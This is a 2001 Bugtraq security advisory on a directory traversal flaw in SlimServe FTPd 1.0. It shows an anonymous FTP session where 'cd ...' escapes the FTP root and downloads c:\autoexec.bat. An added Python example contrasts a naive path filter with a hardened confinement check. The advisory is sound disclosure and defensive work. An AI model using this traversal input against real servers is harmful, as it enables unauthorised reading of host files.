Bugtraq mailing list archives

Vulnerability in SlimServe FTPd


From: joetesta () HUSHMAIL COM
Date: Wed, 28 Feb 2001 18:35:23 -0500

----- Begin Hush Signed Message from joetesta () hushmail com -----

Vulnerability in SlimServe FTPd



    Overview

SlimServe FTPd v1.0 is an FTP server for Windows available from
http://www.whitsoftdev.com and http://www.download.com.  A directory
traversal vulnerability exists: the server does not reject the multi-dot
relative path component '...', which Windows resolves as climbing more than
one directory level, so a client (even an anonymous one) can break out of
the FTP root and read files elsewhere on the host.



    Details

The following session illustrates the problem.  The FTP root was
"c:\directory\directory"; after "cd ...", the server hands out
c:\autoexec.bat, two directory levels above the root.

% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to xxxxxxxxxx.rh.rit.edu.
User (xxxxxxxxxx.rh.rit.edu:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
ftp>





    Solution

No quick fix or workaround is known for the server itself.  A correct fix
has to canonicalize every client-supplied path (rejecting dot-only
components such as '..' and '...', drive letters and absolute paths) and
verify that the resolved path still lies under the FTP root before opening
it.  Until a fixed version is available, the server should not be exposed
to untrusted networks.
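The following Python script is an added example; it is not part of the original advisory and not SlimServe's code.  It contrasts a naive filter that rejects only '..' (and therefore lets '...' through, as in the session above) with a hardened path check that rejects dot-only components and verifies the canonical result stays under the FTP root.  The DOS-style resolution it emulates (each extra dot climbs one more level) is an assumption inferred from the session, where 'cd ...' from c:\directory\directory lands in c:\; FTP_ROOT, confine and the other names are the example's own.

```python
import ntpath
import re

# Constructed example: the FTP root used in the advisory's session.
FTP_ROOT = r"c:\directory\directory"

SEP_RE = re.compile(r"[\\/]+")


def naive_is_allowed(client_path: str) -> bool:
    """The kind of filter that fails against this bug: it rejects only the
    literal '..' component, so '...' passes straight through to the OS."""
    return ".." not in SEP_RE.split(client_path)


def dos_resolve(root: str, client_path: str) -> str:
    """Emulate how a DOS-era Windows resolver treats dot-only components:
    '.' stays put, '..' climbs one level, '...' climbs two, '....' three.
    Assumption: this emulation is written to reproduce the advisory's session
    (root c:\\directory\\directory, 'cd ...' lands in c:\\); it does not call
    any real OS API."""
    drive, tail = ntpath.splitdrive(root)
    stack = [c for c in SEP_RE.split(tail) if c]
    for comp in SEP_RE.split(client_path):
        if not comp or comp == ".":
            continue
        if set(comp) == {"."}:
            for _ in range(len(comp) - 1):
                if stack:
                    stack.pop()
            continue
        stack.append(comp)
    return drive + "\\" + "\\".join(stack)


def confine(root: str, client_path: str) -> str:
    """Map an FTP virtual path onto a filesystem path under root, or raise.

    Rules (hypothetical hardened check, not SlimServe's own code):
      - a leading '/' or '\\' means the FTP root, never the drive root;
      - drive letters and any component containing ':' are rejected
        (':' is illegal in Windows file names and introduces drives/streams);
      - a component made only of dots and spaces is rejected outright, which
        covers '..', '...', '....' and '.. ' (Win32 strips trailing dots and
        spaces, so '.. ' would otherwise collapse to '..');
      - finally the normalised result must still lie under root.
    """
    if ntpath.splitdrive(client_path)[0]:
        raise PermissionError("drive letter not allowed: %r" % client_path)
    comps = []
    for comp in SEP_RE.split(client_path.lstrip("\\/")):
        if not comp or comp == ".":
            continue
        if ":" in comp:
            raise PermissionError("illegal character ':' in %r" % comp)
        if not comp.strip(". "):
            raise PermissionError("dot-only component %r rejected" % comp)
        comps.append(comp)
    root_n = ntpath.normpath(root)
    full = ntpath.normpath(ntpath.join(root_n, *comps))
    # Defence in depth: even if a rule above were bypassed, refuse anything
    # whose canonical form is not inside the root.
    if ntpath.commonpath([root_n, full]) != root_n:
        raise PermissionError("path escapes FTP root: %r" % full)
    return full


def is_rejected(client_path: str) -> bool:
    """True if the hardened check refuses client_path."""
    try:
        confine(FTP_ROOT, client_path)
    except PermissionError:
        return True
    return False


def compare(client_path: str) -> tuple:
    """(naive verdict, where DOS resolution actually lands, hardened verdict)."""
    hardened = "REJECTED" if is_rejected(client_path) else confine(FTP_ROOT, client_path)
    return naive_is_allowed(client_path), dos_resolve(FTP_ROOT, client_path), hardened


if __name__ == "__main__":
    for p in ("/pub/readme.txt", "/../autoexec.bat", "/.../autoexec.bat", "/..../x.txt"):
        print(p, "->", compare(p))
```

Run it as-is to see the three verdicts side by side: the naive filter accepts "/.../autoexec.bat", the emulated resolver shows it landing on c:\autoexec.bat, and the hardened check refuses it.  The dot-only rule is deliberately broader than the single case in the advisory (it also covers four or more dots and trailing-space variants), because a rule that enumerates known-bad spellings is exactly what fails here.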



    Vendor Status

WhitSoft Development was contacted via <mwhitlock () whitsoftdev com> on
Tuesday, February 20, 2001.  No reply was received.



    - Joe Testa  ( e-mail: joetesta () hushmail com / AIM: LordSpankatron )


----- Begin Hush Signature v1.3 -----
BdKXWOXtYQqLBhT0XXyjq8msVo/YPcLXDI/inYF7lTcYeYbHERn9vjPhP0RMD5HnALmF
aUXa8uek5Zpm2ZUukmAqMH03zA997x1MYtzHqvdpyU/7XfZIDynkrEoAp+beYPx72IED
Xxve3ecqaTmG3BdenblWF9UrjkXcpIRNPi3PoAG91Ql3NikjXeVh+pUlogh3MDJ1XO1O
/Z5tFkbqsqKIe6f5ezRD7oxtecFxOEtjMNYQuQTFEaUJBF3x7ydAxYvMLn1Xi+332cJ/
+lC/ra1vkow1kaCCTigBxTgdcueMgfduO0zqd2bFNdyWK8llHT/LFqDGPL3+zkex/U/e
Sd9wEtkqBQuutyL/M9ZxY/r7XIrWdwm4VG+AKKEhsRCzenLgUaiJMGjp+8SnZ/+jf3bD
ga/OkZztzza0pOBimOdlfRSWqSQX2iE77gpExvdo/4y5ZK+VSGx1zQ1q4k2yESNruhRH
owvo0nu7h/9qW2/D+jnLgnz1j7D972sxrDJWwe+JZHof
----- End Hush Signature v1.3 -----

